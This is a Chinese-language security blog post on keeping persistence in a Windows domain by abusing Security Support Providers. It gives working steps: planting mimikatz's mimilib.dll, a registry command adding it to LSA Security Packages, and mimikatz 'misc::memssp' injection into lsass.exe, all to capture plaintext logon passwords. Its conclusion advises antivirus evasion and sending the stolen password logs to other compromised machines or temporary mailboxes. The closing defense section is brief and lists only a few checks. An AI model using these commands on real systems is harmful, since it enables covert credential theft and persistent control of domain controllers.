域渗透|域权限维持之SSP

域渗透|域权限维持之SSP

作者:r0n1n
免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。

0x00 测试环境


域控服务器:Win-2008DC—10.10.10.30
域:god.com

0x01 前言

SSP即Security Support Provider(安全支持提供者)是一个用于实现身份验证的DLL文件,主要用于Windows操作系统的身份认证功能。
当操作系统启动时SSP会被加载到lsass.exe进程中,由于lsass可通过注册表进行扩展,导致了在操作系统启动时,可以加载一个自定义的dll,来实现想要执行的操作。
当我们在域环境内对LSA进行拓展自定义DLL文件时,就能够获取到lsass.exe进程中的明文密码,即使修改密码重新登陆,我们依旧可以获得密码,达到域权限维持的效果。

0x02 利用

方法一、修改注册表扩展功能

1、首先将mimikatz中的 mimilib.dll 传到目标域控的c:\windows\system32\目录下,使用dll的位数与目标操作系统保持一致。
在这里插入图片描述
2、修改注册表,在键值Security Packages下添加 mimilib.dll,系统重启后会记录登陆密码。

reg query HKLM\System\CurrentControlSet\Control\Lsa /v "Security Package"

reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ

在这里插入图片描述
修改成功后的注册表如下图所示:
在这里插入图片描述
3、重启目标系统,重启后有用户登陆到当前系统,会在c:\windows\system32\目录下生成一个记录登陆账号密码的kiwissp.log文件。
在这里插入图片描述
在这里插入图片描述

方法二、进程注入lsass.exe

1、使用mimikatz对lsass.exe进程注入,会在C:\Windows\System32\生成一个mimilsa.log日志文件,里面包含当前登陆的明文密码。

privilege::debug
misc::memssp

在这里插入图片描述
在这里插入图片描述

0x03 总结

攻防实战中,靶机很难会重启,攻击者重启的话风险过大,因此可以在靶机上把两个方法相互结合起来使用效果比较好,前提需要做好免杀,并且可以尝试利用把生成的日志密码文件发送到其他内网被控机器或者临时邮箱。

0x04 防御

对于两种方法的详细分析,在防御策略上也要根据攻击步骤进行防御:首先检查注册表中HKLM\System\CurrentControlSet\Control\Lsa\Security Packages项中是否含有可疑的DLL文件、再检查C:\Windows\System32\目录下是否存在可疑的DLL文件,最后可以使用第三方的工具来查看LSA中是否存在可疑DLL文件。

0x05 了解更多安全知识

欢迎关注我们的安全公众号,学习更多安全知识!!!
欢迎关注我们的安全公众号,学习更多安全知识!!!
欢迎关注我们的安全公众号,学习更多安全知识!!!
在这里插入图片描述

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

灼剑(Tsojan)安全团队

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值